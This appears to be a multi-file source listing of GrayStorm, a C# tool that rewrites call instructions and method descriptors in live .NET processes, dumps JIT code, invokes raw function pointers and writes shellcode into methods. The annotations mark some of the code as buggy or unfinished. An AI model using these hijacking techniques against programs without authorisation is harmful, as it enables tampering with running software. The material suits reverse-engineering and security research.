    /// 64-bit entry point (exported as "Disasm" from BeaEngine64.dll). Takes a pointer to an
    /// unmanaged copy of <see cref="Disasm"/>; the caller does the StructureToPtr/PtrToStructure
    /// round trip itself (see disassemble.disassembler). Same search-order remark as above.
    /// </summary>
    [DllImport("BeaEngine64.dll", EntryPoint = "Disasm")]
    public static extern int Disasm64([In, Out] IntPtr diasm);
    #endregion P/Invoke
}
16 | }
--------------------------------------------------------------------------------
/beaEngine/Structs.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace GrayStorm.beaEngine
5 | {
6 | #region structs
// REX prefix fields (W/R/X/B bits plus a presence state), one byte each. Sequential layout with
// Pack = 1 mirrors the native BeaEngine structure; field order and types must not change.
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public class REX_Struct
{
    public byte W_;
    public byte R_;
    public byte X_;
    public byte B_;
    public byte state;
}
16 |
// Prefix bytes found in front of the decoded instruction: a count, then one byte per possible
// prefix, then the REX block. Native layout (Pack = 1, sequential) — do not reorder.
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public class PrefixInfo
{
    public int Number;
    public int NbUndefined;
    public byte LockPrefix;
    public byte OperandSize;
    public byte AddressSize;
    public byte RepnePrefix;
    public byte RepPrefix;
    public byte FSPrefix;
    public byte SSPrefix;
    public byte GSPrefix;
    public byte ESPrefix;
    public byte CSPrefix;
    public byte DSPrefix;
    public byte BranchTaken;
    public byte BranchNotTaken;
    // Nested formatted class; presumably marshalled inline as part of this structure — confirm
    // the marshalled size against the native header if Marshal.SizeOf(Disasm) ever disagrees.
    public REX_Struct REX;
}
37 |
// Per-flag effect of the instruction on EFLAGS; each byte holds a BeaConstants.EFlagState code.
// The trailing alignment byte pads the native structure. Pack = 1, sequential — do not reorder.
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public class EFLStruct
{
    public byte OF_;
    public byte SF_;
    public byte ZF_;
    public byte AF_;
    public byte PF_;
    public byte CF_;
    public byte TF_;
    public byte IF_;
    public byte DF_;
    public byte NT_;
    public byte RF_;
    public byte alignment;
}
54 |
// Memory operand decomposition (base + index * scale + displacement). Register fields hold
// BeaEngine register codes; Displacement is a sign-extended 64-bit value. Native layout.
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public class MemoryType
{
    public Int32 BaseRegister;
    public Int32 IndexRegister;
    public Int32 Scale;
    public Int64 Displacement;
}
63 |
// The decoded instruction itself. Opcode is what disassemble.disassembler prints and compares
// against 0xC3 (ret); BranchType holds a BeaConstants.BranchType value as an Int32.
// Mnemonic is a fixed 16-byte inline string. Native layout, Pack = 1 — do not reorder.
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public class InstructionType
{
    public Int32 Category;
    public Int32 Opcode;
    [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 16)]
    public string Mnemonic;
    public Int32 BranchType;
    public EFLStruct Flags;
    public UInt64 AddrValue;
    public Int64 Immediat;
    public UInt32 ImplicitModifiedRegs;
}
77 |
// One operand of the decoded instruction. ArgType and AccessMode carry bit groups from
// BeaConstants.ArgumentType (an enum of the same name — qualify to disambiguate); Memory is
// only meaningful for memory operands. ArgMnemonic is a fixed 32-byte inline string.
// Native layout, Pack = 1 — do not reorder.
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public class ArgumentType
{
    [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 32)]
    public string ArgMnemonic;
    public Int32 ArgType;
    public Int32 ArgSize;
    public Int32 ArgPosition;
    public UInt32 AccessMode;
    public MemoryType Memory;
    public UInt32 SegmentReg;
}
90 |
// Top-level BeaEngine context. Inputs set by the caller: EIP (address to decode), Archi (32/64)
// and Options (BeaConstants.SpecialInfo bits). Outputs: CompleteInstr (fixed 64-byte inline
// text), Instruction, Argument1..3 and Prefix. disassemble.disassembler advances EIP by the
// returned length between calls. Native layout, Pack = 1 — do not reorder.
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public class Disasm
{
    public IntPtr EIP;
    public UInt64 VirtualAddr;
    public UInt32 SecurityBlock;
    [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 64)]
    public string CompleteInstr;
    public UInt32 Archi;
    public UInt64 Options;
    public InstructionType Instruction;
    public ArgumentType Argument1;
    public ArgumentType Argument2;
    public ArgumentType Argument3;
    public PrefixInfo Prefix;
    // No access modifier, so private: exists only to make the marshalled size match the native
    // structure's reserved tail (presumably; verify against the BeaEngine header).
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 40, ArraySubType = UnmanagedType.U4)]
    UInt32[] Reserved_;
}
109 | #endregion structs
110 | }
111 |
--------------------------------------------------------------------------------
/dynamicC/dynamicMethodGenerators.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Reflection.Emit;
6 | using System.Text;
7 |
8 |
9 | namespace GrayStorm.dynamicC
10 | {
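class dynamicMethodGenerators
{
    /// <summary>
    /// Builds a DynamicMethod that copies <paramref name="targetIN"/>'s name, parameter types and
    /// return type but whose body only shows a "Testing Dynamic Methods" message box and returns.
    /// It is a placeholder body used by methodReplacer.DynamicreplaceIL.
    /// </summary>
    /// <param name="targetIN">Method whose signature is copied.</param>
    /// <returns>The completed DynamicMethod. CreateDelegate has already been called on it, so its
    /// IL can no longer be modified.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="targetIN"/> is null (the previous
    /// version failed with a NullReferenceException).</exception>
    public static DynamicMethod CreateTestMethod(MethodInfo targetIN)
    {
        if (targetIN == null)
            throw new ArgumentNullException("targetIN");

        string name = targetIN.Name;
        ParameterInfo[] myArray = targetIN.GetParameters();
        // Type argument restored: the listing had lost it ("List args = new List()"); args is
        // passed to the DynamicMethod constructor as Type[].
        List<Type> args = new List<Type>(myArray.Length + 1);

        foreach (ParameterInfo MyParam in myArray)
            args.Add(MyParam.ParameterType);
        // Note: the return type is appended as an extra *parameter* type as well, so for a
        // non-void target the dynamic method takes one more argument than the target does.
        // Kept as-is because the replacement path may depend on that shape.
        if (targetIN.ReturnType != typeof(void))
        {
            args.Add(targetIN.ReturnType);
        }

        DynamicMethod dynamicMethod =
            new DynamicMethod(
                name,
                MethodAttributes.Static | MethodAttributes.Public,
                CallingConventions.Standard,
                targetIN.ReturnType,
                args.ToArray(),
                targetIN.Module,
                false   // skipVisibility: member-access checks are not bypassed
            );

        //test method
        Type[] showParameters = { typeof(String) };
        MethodInfo simpleShow = typeof(System.Windows.Forms.MessageBox).GetMethod("Show", showParameters);

        // emit: push the message, call MessageBox.Show(string), discard its result, return.
        // NOTE(review): nothing is left on the stack at ret, so for a non-void target this IL is
        // invalid and the method fails when it is compiled.
        ILGenerator ilgen = dynamicMethod.GetILGenerator();
        ilgen.Emit(OpCodes.Ldstr, "Testing Dynamic Methods");
        ilgen.Emit(OpCodes.Call, simpleShow);
        ilgen.Emit(OpCodes.Pop);
        ilgen.Emit(OpCodes.Ret);
        // CreateDelegate completes the method; the delegate itself was never used, so the
        // unused local that held it is gone.
        dynamicMethod.CreateDelegate(typeof(Action));
        //dynamicMethod.Invoke(null, new object[] { });
        return dynamicMethod;
    }
}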
53 | }
54 |
--------------------------------------------------------------------------------
/dynamicC/methodReplacer.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | using System.Reflection;
7 | using System.Runtime.CompilerServices;
8 | using System.Reflection.Emit;
9 |
10 | namespace GrayStorm.dynamic_C
11 | {
class methodReplacer
{
    /// <summary>
    /// Redirects <paramref name="originalMethod"/> to <paramref name="newMethod"/> by patching the
    /// runtime's method descriptor (see <see cref="ReplaceMethod"/>). Both must be ordinary
    /// (non-dynamic) methods. Does nothing when either argument is null.
    /// </summary>
    public static void replaceIL(MethodInfo originalMethod, MethodInfo newMethod)
    {
        //make new user inputted method
        //MethodInfo newMethod = liveMethod.userInputMethod();
        if (newMethod == null || originalMethod == null)
            return;

        // Jit the method if not already
        RuntimeHelpers.PrepareMethod(newMethod.MethodHandle);

        //replace non-dynaically
        ReplaceMethod(newMethod, originalMethod, false);
    }

    /// <summary>
    /// Dynamic-method variant of <see cref="replaceIL"/>.
    /// NOTE(review): looks unfinished — the DynamicMethod built here is never used,
    /// <paramref name="containedIndex"/> is never read, and <paramref name="replacementMethod"/>
    /// is passed as both source and destination, so <see cref="getDynamicIntPtr"/> ends up being
    /// invoked on a MethodInfo that is not a DynamicMethod.
    /// </summary>
    public static void DynamicreplaceIL(MethodInfo replacementMethod, int containedIndex)
    {
        // Jit the method if not already
        RuntimeHelpers.PrepareMethod(replacementMethod.MethodHandle);

        //create a dynamic method
        DynamicMethod dynamicMethod = dynamicC.dynamicMethodGenerators.CreateTestMethod(replacementMethod);

        ReplaceMethod(replacementMethod, replacementMethod, true);
    }

    /// <summary>
    /// http://blog.naver.com/techshare/100115994763
    /// Overwrites the word located two 32-bit ints (8 bytes) past
    /// <c>originalMethod.MethodHandle.Value</c> with either the function pointer of a dynamic
    /// method (<paramref name="dynamicPtr"/> true) or the 32-bit value found at the same offset in
    /// <paramref name="replacementMethod"/>'s handle (false). That offset is presumably the
    /// native-code slot of the CLR's internal method descriptor on the runtime this tool was
    /// written for; it is not a public contract and differs between CLR versions.
    /// </summary>
    /// <param name="replacementMethod">the method whose code pointer is copied (the author's
    /// original note calls this "the destination dynamicMethod/IntPtr")</param>
    /// <param name="originalMethod">the method whose descriptor is overwritten ("the source
    /// method/IntPtr" in the original note)</param>
    /// <param name="dynamicPtr">Whether or not the dynamicMethod is dynamic</param>
    /// <remarks>
    /// NOTE(review): the store goes through a ulong*, so 8 bytes are written in every branch,
    /// including on a 32-bit runtime where only the low 4 bytes are meaningful. No page-protection
    /// change, pinning or synchronisation surrounds the write, so a concurrent caller of the
    /// original method can observe a half-patched descriptor.
    /// </remarks>
    public static void ReplaceMethod(MethodInfo replacementMethod, MethodInfo originalMethod, bool dynamicPtr)
    {
        IntPtr dynamicIntPtr = IntPtr.Zero;
        IntPtr originalMethodIntPtr = IntPtr.Zero;

        unsafe
        {
            // +2 ints = 8 bytes into the descriptor, regardless of pointer size.
            originalMethodIntPtr = (IntPtr)(((int*)originalMethod.MethodHandle.Value.ToPointer() + 2));

            if (!dynamicPtr)
                dynamicIntPtr = (IntPtr)(((int*)replacementMethod.MethodHandle.Value.ToPointer() + 2));
            else
                dynamicIntPtr = getDynamicIntPtr(replacementMethod);

            ulong* overwriteIntPtr = (ulong*)originalMethodIntPtr.ToPointer();
            if (dynamicPtr)
            {
                // Store the function pointer itself (zero-extended to 64 bits on x86).
                if (IntPtr.Size == 8)
                {
                    *overwriteIntPtr = (ulong)dynamicIntPtr.ToInt64();
                }
                else
                {
                    *overwriteIntPtr = (uint)dynamicIntPtr.ToInt32();
                }
            }
            else
                // Copy the 32-bit value stored in the replacement's slot (only 4 bytes are read).
                *overwriteIntPtr = *((uint*)dynamicIntPtr.ToPointer());
        }
    }

    /// <summary>
    /// Obtains the RuntimeMethodHandle of a DynamicMethod through its non-public
    /// GetMethodDescriptor method, JIT-compiles it, and returns the native entry point.
    /// </summary>
    /// <param name="dunamicInfo">Must actually be a DynamicMethod; otherwise the reflective
    /// Invoke fails (and if the private method is missing on this runtime,
    /// getMethodDescriptorInfo is null and the Invoke throws a NullReferenceException).</param>
    public static IntPtr getDynamicIntPtr(MethodBase dunamicInfo)
    {
        RuntimeMethodHandle handle;
        MethodInfo getMethodDescriptorInfo = typeof(DynamicMethod).GetMethod("GetMethodDescriptor", BindingFlags.NonPublic | BindingFlags.Instance);
        handle = (RuntimeMethodHandle)getMethodDescriptorInfo.Invoke(dunamicInfo, null);
        RuntimeHelpers.PrepareMethod(handle);
        return handle.GetFunctionPointer();
    }
}
85 | }
86 |
--------------------------------------------------------------------------------
/dynamicC/userCreatedMethods.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Text;
6 |
7 |
8 | namespace GrayStorm.dynamicC
9 | {
class userCreatedMethods
{
    // Global registry of methods the user has created in the editor. The generic type argument
    // was lost when this listing was extracted ("List ... = new List()"); presumably
    // List<MethodInfo> — confirm against the callers.
    public static List userCreatedMethodsList = new List();
}
14 | }
15 |
--------------------------------------------------------------------------------
/memoryHijacking/StorageInformation.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Reflection;
6 |
7 | namespace GrayStorm
8 | {
/// <summary>
/// Per-method record kept in methodHelpers.StorageInformationArrayList. Fields are plain
/// read/write properties; the callers visible in this listing use methodSignature as the lookup
/// key (methodHelpers.containedInList), oldMethod as the byte pattern that is searched
/// (assemblyControlFlow.PatternAt) and methodIntPtr as the base address that is patched.
/// </summary>
public class StorageInformation
{
    // Reflection handle of the method this record describes; lookup key.
    public MethodInfo methodSignature { get; set; }
    // Whether the method's native code has been dumped yet — presumably set by the dump button; confirm.
    public bool dumped { get; set; }
    // Byte dump of the method's native code (meaning vs. oldMethod not visible here — confirm).
    public byte[] memory { get; set; }
    // Byte dump that assemblyControlFlow searches for the call sequence to patch.
    public byte[] oldMethod { get; set; }
    // Address of the method's native code; base for the in-place patches.
    public IntPtr methodIntPtr { get; set; }
    // Address before any redirection — presumably kept for restore; confirm.
    public IntPtr originalIntPtr { get; set; }
    // Delegate built for the method (see methodHelpers.methodInfoToDelegate).
    public Delegate methodDelegate { get; set; }
}
19 | }
20 |
--------------------------------------------------------------------------------
/memoryHijacking/assemblyControlFlow.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
public class assemblyControlFlow
{
    #region 1337 code
    ///
    ///At the time of a call the dword register is called as such
    ///0xFF call dword [00189AC4h] which is 6 bytes of 0xFF,0x15,0xC4,0x9A,0x18,0x0
    ///I can then select the immediate value and use that as a selector to find the index into memory to set up a new relative call.
    ///Once the index in memory is located, I can use manipulation of the long type to calculate a new offset.
    ///I then place that offset into the location of the 0xFF by replacing the sequence with a "call immediate/0xE8" instruction.
    ///
    /// <summary>
    /// Rewrites, in the live native code of domainTraverser.currentMethod, the 6-byte
    /// "call dword [imm32]" sequence whose immediate the user has selected in the editor into a
    /// 5-byte relative call to <paramref name="methodPointer"/> plus one NOP.
    /// Preconditions: a current method and a non-zero target; the method is dumped on demand.
    /// 32-bit only — <c>methodPointer.ToInt32()</c> throws OverflowException for a 64-bit address.
    /// NOTE(review): the selected text is parsed with Convert.ToInt32(..., 16) without a guard,
    /// so a malformed selection throws FormatException out of this method (not caught here).
    /// </summary>
    /// <param name="methodPointer">Native address the rewritten call should target.</param>
    public static void replaceDwordCall(IntPtr methodPointer)
    {
        string intPtrString;
        Int32 replaceAddress = 0;
        IntPtr methodAssembly;
        int containedIndex = -1;
        byte[] replacementIndex = null;
        int indexReplace;
        int count = 0;
        long dstAddress;
        long srcAddress;
        long newCallPtr;

        if (domainTraverser.currentMethod == null || methodPointer == IntPtr.Zero)
            return;

        // Make sure the current method has a dump entry; trigger the dump button handler if not.
        containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
        if (containedIndex == -1)
        {
            grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
            containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
        }
        methodAssembly = methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr;

        // Selected immediate from the editor: strip newline, "0x" and the trailing "h", parse hex.
        intPtrString = grayStorm._memoryHijacker.editor_RTB.SelectedText;
        grayStorm._memoryHijacker.editor_RTB.SelectionColor = System.Drawing.Color.White;
        grayStorm._memoryHijacker.editor_RTB.SelectionBackColor = System.Drawing.Color.Blue;
        intPtrString = intPtrString.Replace("\n", string.Empty);
        intPtrString = intPtrString.Replace("0x", string.Empty);
        intPtrString = intPtrString.Replace("h", string.Empty);
        replaceAddress = Convert.ToInt32(intPtrString, 16);

        // The disassembly view shows the immediate already byte-swapped; the hex dump does not,
        // hence the reverse in the else branch.
        if (grayStorm._memoryHijacker.disassemble_CB.Checked)
        {
            replacementIndex = BitConverter.GetBytes(replaceAddress);
        }
        else
        {
            replacementIndex = BitConverter.GetBytes(replaceAddress);
            Array.Reverse(replacementIndex);
        }

        Array.Resize(ref replacementIndex, 6);

        //call dword [0x########] conversion to little endian to make room for 0xff and 0x15
        for (count = 3; count >= 0; count--)
        {
            replacementIndex[count + 2] = replacementIndex[count];
        }
        replacementIndex[0] = 0xff;
        replacementIndex[1] = 0x15;

        // Locate the full FF 15 <imm32> sequence in the dumped bytes.
        indexReplace = PatternAt(methodHelpers.StorageInformationArrayList[containedIndex].oldMethod, replacementIndex);

        if (indexReplace < 0)
        {
            System.Windows.Forms.MessageBox.Show("Could not find the replacement index");
            return;
        }

        dstAddress = (long)((int)methodPointer.ToInt32());//new address to call
        srcAddress = (long)methodAssembly + indexReplace + 5; //memory location of caller + position of 0xFF + size of call sequence
        newCallPtr = dstAddress - srcAddress;

        //Call immediate and NOP to overwrite 6 bytes.
        replacementIndex[0] = 0xe8;
        replacementIndex[1] = (byte)(newCallPtr);
        replacementIndex[2] = (byte)(newCallPtr >> 8);
        replacementIndex[3] = (byte)(newCallPtr >> 16);
        replacementIndex[4] = (byte)(newCallPtr >> 24);
        replacementIndex[5] = 0x90;

        //Write the new custom C# IntPtr over the existing index of the call.
        // Byte-by-byte, non-atomic write into executable memory with no protection change; a
        // thread executing this code concurrently can see a partially patched sequence.
        for (count = 0; count <= 5; count++)
        {
            System.Runtime.InteropServices.Marshal.WriteByte(new IntPtr(methodAssembly.ToInt64() + indexReplace + count), replacementIndex[count]);
        }
    }

    ///
    /// Replace a 0xE8 call
    /// dstAddress - methodFunPtr + callOffset + byteOffset = new destination address
    ///
    ///
    /// <summary>
    /// Same as <see cref="replaceDwordCall"/> for an existing 5-byte relative call (E8 imm32):
    /// the selected immediate is located in the dump, the byte before the match is taken as the
    /// E8 opcode, and the 5 bytes are rewritten to call <paramref name="methodPointer"/>.
    /// Only the hex-dump view is supported; the disassembly view shows a resolved target rather
    /// than the raw immediate and is rejected with a message box. Same 32-bit-only and
    /// unguarded-parse caveats as replaceDwordCall.
    /// </summary>
    /// <param name="methodPointer">Native address the rewritten call should target.</param>
    public static void replaceE8Call(IntPtr methodPointer)
    {
        string intPtrString;
        Int32 replaceAddress = 0;
        IntPtr methodAssembly;
        int containedIndex = -1;
        byte[] replacementIndex = null;
        int indexReplace;
        int count = 0;
        long dstAddress;
        long srcAddress;
        long newCallPtr;

        if (domainTraverser.currentMethod == null || methodPointer == IntPtr.Zero)
            return;

        containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
        if (containedIndex == -1)
        {
            grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
            containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
        }
        methodAssembly = methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr;

        intPtrString = grayStorm._memoryHijacker.editor_RTB.SelectedText;
        grayStorm._memoryHijacker.editor_RTB.SelectionColor = System.Drawing.Color.White;
        grayStorm._memoryHijacker.editor_RTB.SelectionBackColor = System.Drawing.Color.Blue;
        intPtrString = intPtrString.Replace("\n", string.Empty);
        intPtrString = intPtrString.Replace("0x", string.Empty);
        intPtrString = intPtrString.Replace("h", string.Empty);
        replaceAddress = Convert.ToInt32(intPtrString, 16);

        //call immediate conversion to little endian to make room
        if (grayStorm._memoryHijacker.disassemble_CB.Checked)
        {
            System.Windows.Forms.MessageBox.Show("Not yet supported, perform action in hex dump");
            return;
            //Need to get the real address that would be in the disassembly. :(
            //How? TODO
            // newCallPtr = (long)replaceAddress + (long)methodAssembly + 5 + 0; //restore the assembly dump by taking dst + methodAddr + 5 + offset??????
            // replaceAddress = Convert.ToInt32(newCallPtr);
            // replacementIndex = BitConverter.GetBytes(replaceAddress);
        }
        else
        {
            replacementIndex = BitConverter.GetBytes(replaceAddress);
            Array.Reverse(replacementIndex);
        }

        // Only the 4 immediate bytes are matched; step back one byte to the E8 opcode. A match at
        // offset 0 therefore becomes -1 and is reported as "not found", which is correct since an
        // immediate cannot start at the first byte of the method.
        indexReplace = PatternAt(methodHelpers.StorageInformationArrayList[containedIndex].oldMethod, replacementIndex);
        indexReplace -= 1; //because not matching on the 0xE8B
        if (indexReplace < 0)
        {
            System.Windows.Forms.MessageBox.Show("Could not find the replacement index");
            return;
        }

        dstAddress = (long)((int)methodPointer.ToInt32());//new address to call
        srcAddress = (long)methodAssembly + indexReplace + 5; //memory location of caller + position of 0xFF + size of call sequence
        newCallPtr = dstAddress - srcAddress;

        Array.Resize(ref replacementIndex, 5);
        //Call immediate and NOP to overwrite 5 bytes.
        replacementIndex[0] = 0xe8;
        replacementIndex[1] = (byte)(newCallPtr);
        replacementIndex[2] = (byte)(newCallPtr >> 8);
        replacementIndex[3] = (byte)(newCallPtr >> 16);
        replacementIndex[4] = (byte)(newCallPtr >> 24);

        //Write the new custom C# IntPtr over the existing index of the call.
        // Non-atomic byte-wise write into executable memory; see the note in replaceDwordCall.
        for (count = 0; count <= 4; count++)
        {
            System.Runtime.InteropServices.Marshal.WriteByte(new IntPtr(methodAssembly.ToInt64() + indexReplace + count), replacementIndex[count]);
        }
    }

    /// <summary>
    /// Index of the first occurrence of <paramref name="pattern"/> in <paramref name="source"/>,
    /// or -1. An empty pattern matches at 0. Each position is tested with a fresh
    /// Skip/Take/SequenceEqual chain, so the cost is O(source.Length * pattern.Length) with an
    /// allocation per position — fine for method-sized dumps, not for large buffers.
    /// Throws NullReferenceException/ArgumentNullException for null arguments.
    /// </summary>
    public static int PatternAt(byte[] source, byte[] pattern)
    {
        for (int i = 0; i < source.Length; i++)
        {
            if (source.Skip(i).Take(pattern.Length).SequenceEqual(pattern))
            {
                return i;
            }
        }
        return -1;
    }
    #endregion 1337 code
}
191 | }
192 |
--------------------------------------------------------------------------------
/memoryHijacking/domainTraverser.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
/// <summary>
/// Process-wide "current selection" shared by the GUI and the hijacking code: whatever the user
/// last picked in the hierarchy viewer. All members are plain static auto-properties with no
/// synchronisation, so they are only safe to use from the UI thread.
/// </summary>
public static class domainTraverser
{
    // Method currently selected; assemblyControlFlow refuses to patch when this is null.
    public static System.Reflection.MethodInfo currentMethod
    {
        get;
        set;
    }

    // Constructor currently selected (not referenced in the visible code).
    public static System.Reflection.ConstructorInfo currentConstructor
    {
        get;
        set;
    }

    // Assembly the selection belongs to.
    public static System.Reflection.Assembly assemblyInfo
    {
        get;
        set;
    }

    // Type the selection belongs to.
    public static System.Type typeInfo
    {
        get;
        set;
    }

    // Live object instance selected in the object hunter, if any.
    public static object curObject
    {
        get;
        set;
    }

    // StorageInformation record for the current method (presumably the entry methodHelpers.containedInList finds — confirm).
    public static StorageInformation curStorage
    {
        set;
        get;
    }
}
46 | }
47 |
--------------------------------------------------------------------------------
/memoryHijacking/methodHelpers.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Runtime.InteropServices;
4 | using System.Reflection;
5 | using System.Diagnostics;
6 | using System.Text.RegularExpressions;
7 | using System.Runtime.CompilerServices;
8 | using System.Reflection.Emit;
9 | using System.Windows.Forms;
10 | using System.Text;
11 | using System.Collections.Generic;
12 |
13 | namespace GrayStorm
14 | {
15 | #region storageInformationHelpers
16 | ///
17 | /// All of the global static variables we need for the project will be declared here. Namely, the array list of storageInformation.
18 | ///
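public static class methodHelpers
{
    //publics for the class for methodInformation.
    /// <summary>
    /// Every method dumped/patched so far; the index returned by <see cref="containedInList"/>
    /// refers to this list. (Type argument restored: the listing had lost it.)
    /// </summary>
    public static List<StorageInformation> StorageInformationArrayList = new List<StorageInformation>();

    /// <summary>Builds a delegate for <paramref name="methodIN"/> via signatures.getSignature.</summary>
    public static Delegate methodInfoToDelegate(System.Reflection.MethodInfo methodIN)
    {
        return signatures.getSignature(methodIN);
    }

    //Boring linear search to find the index of the targeted method. O(N).
    /// <summary>
    /// Index of the record whose methodSignature is <paramref name="selectedMethod"/>, or -1.
    /// A null argument now returns -1 instead of matching a record with a null signature, and
    /// null records are skipped rather than dereferenced.
    /// </summary>
    public static int containedInList(MethodInfo selectedMethod)
    {
        if (selectedMethod == null)
            return -1;

        for (int x = 0; x < StorageInformationArrayList.Count; x++)
        {
            StorageInformation entry = StorageInformationArrayList[x];
            if (entry != null && entry.methodSignature == selectedMethod)
                return x;
        }
        return -1;
    }
}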
44 | #endregion storageInformationHelpers
45 | }
46 |
--------------------------------------------------------------------------------
/memoryHijacking/methodHijacking.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Reflection;
6 |
7 |
8 | namespace GrayStorm
9 | {
class methodHijacking
{
    /// <summary>
    /// Thin wrapper: forwards <paramref name="methodIntPtr"/> unchanged to
    /// assemblyHelpers.writeDynamicShellcode. No IntPtr.Zero check is performed here.
    /// </summary>
    public static void writeAMethod(IntPtr methodIntPtr)
    {
        IntPtr target = methodIntPtr;
        assemblyHelpers.writeDynamicShellcode(target);
    }
}
17 | }
18 |
--------------------------------------------------------------------------------
/memoryHijacking/methodInvoking.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Reflection;
6 |
7 | namespace GrayStorm
8 | {
class methodInvoking
{
    #region callMethod
    //1.) get the signature of the target. (Static/Non-Satic, Return/Non-Return, Arguments)
    /// <summary>
    /// Delegate matching <paramref name="methodIN"/>, obtained from signatures.getSignature.
    /// Static targets are passed through RuntimeHelpers.PrepareMethod first ("JIT the method").
    /// </summary>
    public Delegate getMethodDelegate(MethodInfo methodIN)
    {
        bool jitFirst = methodIN.IsStatic;
        if (jitFirst)
        {
            System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(methodIN.MethodHandle); //JIT the method!
        }
        return signatures.getSignature(methodIN);
    }

    //2.) Get the function pointer from the Delegate
    /// <summary>
    /// Native entry point of the delegate's target method, or IntPtr.Zero when it cannot be
    /// obtained — every exception (including a null <paramref name="targetIN"/>) is swallowed.
    /// </summary>
    public IntPtr getIntPtrFromDelegate(Delegate targetIN)
    {
        IntPtr entryPoint;
        try
        {
            RuntimeMethodHandle handle = targetIN.Method.MethodHandle;
            entryPoint = handle.GetFunctionPointer();
        }
        catch
        {
            entryPoint = IntPtr.Zero;
        }
        return entryPoint;
    }

    //3.) Call the method if needed/wanted.
    /// <summary>
    /// Invokes the code at <paramref name="methodAddress"/> through one of the assemblyHelpers
    /// stubs: 0 selects call_a_fun_ptr, 1 selects call_a_fun_ptr_INT3 (presumably the variant
    /// that breaks into a debugger first). Any other value does nothing.
    /// </summary>
    public static void fireMethod(IntPtr methodAddress, int whichCall)
    {
        switch (whichCall)
        {
            case 0:
                assemblyHelpers.callATrueIntPtr(methodAddress, assemblyHelpers.call_a_fun_ptr);
                break;
            case 1:
                assemblyHelpers.callATrueIntPtr(methodAddress, assemblyHelpers.call_a_fun_ptr_INT3);
                break;
        }
    }
    #endregion callMethod
}
45 | }
46 |
--------------------------------------------------------------------------------
/objectHunter/foundObject.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
/// <summary>
/// One hit from the object hunter: the object itself, a display name and the address it was
/// found at. Plain public fields; ToString is what the list box shows.
/// </summary>
public class foundObject
{
    // The object this entry refers to.
    public object targetObject;
    // Display text (ToString returns it as-is, null included).
    public string name;
    // Address the object was found at.
    public IntPtr addrOfObj;

    /// <summary>The stored name, unchanged.</summary>
    public override string ToString()
    {
        string display = this.name;
        return display;
    }
}
19 | }
20 |
--------------------------------------------------------------------------------
/objectHunter/heapObjects.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using GrayStorm;
6 |
7 | namespace GrayStorm.objectHunter
8 | {
9 | public static class heapObjects
10 | {
11 | #region init
// Major CLR version digit ('2' or '4'); refreshed from Environment.Version in getAddresses.
public static char clrVersion = '4';
// Stack-slot distance (in pointer widths) used by getObjectAddr64/GetInstance/GetInstance64.
// getAddresses only re-assigns it on a 32-bit CLR 2 (see the note there), so it is 1 otherwise.
public static int clrSub = 1;
// Scan width; not referenced in the visible part of this file (presumably used by
// getAllObjects — confirm).
public static int constant = 50000;//can be adjusted.. need better signature :( just till true?

// Signature shared by the native stubs below: object address in, MethodTable (or other table
// entry) pointer out. getObjectMethodTable binds them with GetDelegateForFunctionPointer.
public delegate IntPtr getMethodTableDel(IntPtr objectIN);
17 |
/// <summary>
/// Starting from the object selected in <paramref name="objectsListBox"/>, finds other heap
/// objects with the same MethodTable and refills the list box with the original entry followed by
/// one foundObject per match. Address resolution goes through the per-architecture helpers
/// below and getAllObjects (not in this listing). Everything here depends on undocumented
/// runtime internals (stack-frame layout, object header layout) and on executing raw machine
/// code, so it is inherently unsafe and CLR-version specific.
/// </summary>
/// <param name="objectsListBox">List box whose SelectedItem is searched for; it is cleared and refilled.</param>
public static void getAddresses(System.Windows.Forms.ListBox objectsListBox)
{
    //see if clr is version 2 or 4
    clrVersion = Environment.Version.ToString().ElementAt(0);

    // NOTE(review): null when nothing is selected; thisObject.GetType() below then throws.
    object thisObject = objectsListBox.SelectedItem;
    object foundObject = null;
    IntPtr obj = IntPtr.Zero;
    IntPtr methodTable = IntPtr.Zero;
